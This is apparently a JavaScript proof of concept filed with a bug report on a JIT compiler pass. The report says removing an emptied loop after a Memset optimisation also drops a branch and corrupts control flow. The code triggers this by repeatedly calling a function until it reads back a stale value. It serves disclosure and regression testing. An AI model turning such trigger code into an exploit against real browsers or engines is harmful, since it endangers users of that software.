/*
The optimizations for memory operations may leave empty loops as follows:
for(let i = 0; i < arr.length; i++){
arr[i] = 0;}
Becomes:
Memset(arr, 0, arr.length);for(let i = 0; i < arr.length; i++){// empty!
}
These empty loops will be removed by "BackwardPass::RemoveEmptyLoopAfterMemOp". But this method just removes them without considering branches.
Here's what may happen.
A:
Memset(arr, 0, arr.length);
for (let i = 0; i < arr.length; i++) {
}
goto D;// Actually, this is a "BrGe_I4" instruction in the PoC.
C:
...
D:
...
Becomes:
A:
Memset(arr, 0, arr.length);
C:
...
D:
...
So the branch to D is removed together with the empty loop, and execution falls through from A into C. This may break the control flow.
PoC:
*/function opt(a, b, always_true = true){
// Proof-of-concept target: returns true when arr[0] reads back non-zero, which the
// comment on print() below says must not happen. The header comment attributes a
// true result to the emptied loop being removed together with the branch after it.
// Seed the two arrays with distinguishable values: a[0] is the sentinel, b[0] is zero.
a[0] = 1234;
b[0] = 0;
// arr starts as a and is switched to b inside the branch; the call in this file
// passes only (a, b), so always_true takes its default of true.
let arr = a;if(always_true){
// Zero-fill loop: the loop shape the header comment says is turned into a Memset,
// leaving an empty loop behind for the later removal pass.
arr = b;for(let i = 0; i < arr.length; i++)
arr[i] = 0;}
// When the branch above was taken, arr is b and was just zeroed, so val should be 0.
let val = arr[0];if(val){
// NOTE(review): print is not defined in this file; presumably the JS shell's built-in - confirm.
print(val);// Must be 0, but prints out 1234
return true;}return false;}
// a holds a single element; opt() writes the 1234 sentinel into a[0].
let a = new Uint32Array(1);
// b holds 0x1000 elements and is the array opt() zero-fills. The loop calls opt()
// up to 10000 times and stops at the first call that returns true.
// NOTE(review): the repetition is presumably there so the engine JIT-compiles opt() - confirm.
let b = new Uint32Array(0x1000);for(let i = 0; i < 10000; i++){if(opt(a, b)){break;}}